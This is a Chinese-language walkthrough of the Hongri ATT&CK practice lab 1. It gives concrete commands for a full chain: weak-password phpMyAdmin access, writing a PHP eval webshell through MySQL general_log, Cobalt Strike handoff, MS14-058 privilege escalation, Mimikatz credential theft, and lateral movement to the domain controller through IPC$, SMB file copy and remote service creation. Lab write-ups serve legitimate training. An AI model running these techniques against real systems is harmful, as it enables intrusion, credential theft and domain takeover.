红日靶场(ATTCK实战)1通关方法
概述
首先搭建虚拟机,配置ip和网段。在服务页面找到突破口,如信息收集中端口扫描和子域名搜索,弱密码爆破后进入后台。在开启日志中用sql语法写入webshell,并用蚁剑连接。拿下web服务机后进行内网信息收集,再将蚁剑转到CS控制(cs生成的payload用蚁剑上传并运行,成功连接),用cs自带的ms14-058提权成system。横向移动,用minikatz读取次web的账号密码,建立ipc管道,控制web服务器机把smb的木马,传给内网电脑,用流量转发的思想成功控制域控。
“外网打点 → 内网渗透 → 横向移动 → 控制域控”,涵盖了以下核心知识点:
- Web应用漏洞利用(弱口令 + MySQL日志写Shell)
- 权限提升与C2框架联动(MS14-058提权 + 蚁剑转CS)
- 内网信息收集与凭证窃取(Mimikatz抓密码)
- 横向移动与域控拿下(IPC管道 + SMB横向 + 流量转发)
搭建
外网(vm3)
内网(vm4)
导入虚拟机----“我已复制”
(这里解释一下:想练习一下ip网段配置就点的"我已复制",以上操作与虚拟机中已经配好的相同,也可点"移动"。复制:启动虚拟机后可能会改变ip;移动:不会改变ip。通关2中点的"移动")
web服务器 win7(配ip地址)
外网ip
本地连接1
内网ip
本地连接5
关闭防火墙后 ping一下检查
加入虚拟机
web服务器、域控、域内主机 密码:hongrisec@2026账户:god\administrator
web渗透
web服务器中开启phpstudy
信息收集 如nmap扫描 御剑高速tcp端口扫描工具
phpstudy弱密码 root/root
进入后台:http://192.168.111.128/phpmyadmin/
先查看有没有开启日志:SHOW VARIABLES LIKE "general%"
开启日志:set global general_log = on
设置日志路径,绝对路径在探针里有的:SET GLOBAL general_log_file = "C:/phpStudy/WWW/lfr.php";
设置成功后写马:SELECT "<?php @eval($_POST['x']);?>"
蚁剑连接
内网渗透
内网信息收集
等等等。。。。。
关闭防火墙
当前控制的用户是god\administrator
当前控制的电脑加入了域,域名是god.org
域中有5个用户
。。。。。
蚁剑转CS控制
CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可
kali要和web服务器(win7)一个网段,vmware中设置成vmw3
用蚁剑上传木马,并用蚁剑运行
提权
ms14-058
横向移动(流量转发、拿域控)
用minikatz读取此web服务器(win7)的账号密码
administrator hongrisec@2026
beacon中输入:shell net use \\192.168.52.138\ipc$ "hongrisec@2026" /user:god\administrator
已建立ipc管道,进行远程控制
新开监听SMB,并新创建木马(tageless)
上传SMB_hongriweb1.exe
控制web服务器(win7),将此木马传给内网电脑
shell copy SMB_hongriweb1.exe \\192.168.52.138\C$
控制web服务器远程给138主机创建服务,执行SMB_木马
shell sc \\owa.god.org create test binpath= "cmd.exe /c c:\SMB_hongriweb1.exe
开启服务shell sc \\owa.god.org start test
连接目标机器link owa.god.org
成功!!!
